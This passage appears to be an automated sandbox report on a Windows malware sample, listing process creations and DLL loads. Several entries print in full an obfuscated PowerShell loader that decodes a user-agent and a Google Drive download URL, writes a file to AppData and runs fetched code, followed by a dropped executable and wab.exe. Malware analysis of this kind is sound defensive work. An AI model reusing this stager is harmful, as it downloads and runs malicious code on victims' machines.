'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\newfile\newfile.exe "C:\Users\user\AppData\Roaming\newfile\newfile.exe"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nasolacrimal = 1;$Crummies182='Substrin';$Crummies182+='g';Function Nejsigerens($Paynize){$Respirator=$Paynize.Length-$Nasolacrimal;For($bolsjes=5; $bolsjes -lt $Respirator; $bolsjes+=(6)){$Velmagtstid+=$Paynize.$Crummies182.Invoke($bolsjes, $Nasolacrimal);}$Velmagtstid;}function Vinddrejning($Brinken){. ($Findelings) ($Brinken);}$Sedimentet=Nejsigerens ',hoppMSil.no SkakzSlleriAkkorlHeterlSyncha.ylte/Gardi5 Ympe.Smlst0 Nei Fabel(RomanWSeed.iBed nnPost.dTilhyoTj.new tirrsMod.g PartNaadseTPaali Haf,a1Indru0P,gme.Prjud0 o,ni;Glamo NonpaWBromii SlaunAstra6P.ene4Desmo;Chous gitax T,ne6Angst4Engin;Calyp SubdorLavniv Farv:Nyrel1Rival2Tempo1Faste.Senge0Reo.t)Skamf TricG P oteunl,ccGr ymkGlo eo aute/ .ata2Ca er0thuj 1S.erl0 Beds0Betin1Tete,0Rearr1Typis OstraFsaginiR,ndsrChrone RetsfB,natoI scux B.nd/Bogti1Alter2 A,lu1Svell.,avpr0Brode ';$Accouplement=Nejsigerens 'CrotoUtravasNebuleRetslrPe ta-VinylA,oblegOpstieNonbinKokketOvers ';$Chorioretinal=Nejsigerens ' Top,hGuaratSoliftXosavpBen is flyv:Podni/Jer s/cl padwolfgr K.miiAfglavgreeneBev,l. ScabgPrea oMicroo irayg PyrolHa,moe,ista.HighecHund.oscro,mSpir./MachiuMydricEvenn?Rain.eParcax ,edipgrumboPro,rrNgleftCh,ly= CottdHuntso Eftew TilbnFeutelHom,woPositaLoquadCarac&Plag iEpicudFoste=Possi1 UndeiXenylLSjklefBeman5MyelobRegioI Y gipDefalyKonges Rackm Ef eyBlrehGGemmadKompaUNo,nysUnseet SiakyUan,d6defauc,ueriSErgat9NonfouMe ioMTeatey.ogstD,atklkAlu,aTDecelZ OzelrMirabnsnuffvcongeH opsk ';$Roselil=Nejsigerens 'Forle>Geoge ';$Findelings=Nejsigerens ' Polli SvineFor,lxKoron ';$Forslvende='Tarnishable';Vinddrejning (Nejsigerens 'Vrd.pSPhilaeByr.ttRe to-DigesCStilloTgtgenErholtDoddieWindln,andotSu.er tirz-Pol,lP un ea BegrtredirhYderz SubmaT.oral: omer\at.enT MyceeTryllrNyanjzUs nse Fungt EpidtObligoTrykf.R.flhtSt.afxF.agttConce itr-LuskeVRakkeaWrybilS.eenuAfgife Jell Gunya$ Go,aFMegavoAutomrAtropsSulfolClotsvW.ttieCraninHyperdPolyreAf gt;Rorpi ');Vinddrejning (Nejsigerens 'Udb ki Gennf Medi hefti(TeksttRetypeKni.ssWolfetS lfi-MicropId,liaForbrtpsychhMilea C.onTo,tol:Valut\ErhveTCityee MaizrU.uelzLovfoe Ph etHandetbaksnoSavor.VisiotTessax supetLuf,v)kalci{Hermge OmkoxF rniiPhrentDisk }Discu;Uhums ');$gedde = Nejsigerens 'brneheA,rstcBrunehPaaseoSindb P.rfo%Ge neaArmhup M,slpHivoldprospapontitDiletaFr,ng%Palar\ShogaLSkrupaL,ceicE,imet V.dnoOph hsAdmincEr.opoUnderpLe.ioeIslnd.heikacSubcllL vneahomog Dkket&Skjol& Mali Kvi.detro icEnasbhArchdoOb,as Recre$ Spin ';Vinddrejning (Nejsigerens 'Bolde$ atig .kumlCelluoPost.b FoliaFjolslAphan:DroplCStru,aThemedBemurevicilaTeleou,remfeUnponrDo,ma=Infic(L.tryclrredmAbrfod,ohor Mcca/Prludc Taur Ratg$.iceugFlandeTopmedTvededMisfoeSelve)T ril ');Vinddrejning (Nejsigerens ' Stre$ T,llgPyogelquinqoAsyndb orta ompalTr.ns:BlemmAO shadDet im.ybloiAnit n Scowi lossFanattAzotorGa.isaOrni,tMentoiScrumoVe.stnFishssZaca.g sortrHermauWe,rynProcrdStrmklsp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Lactoscope.cla && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
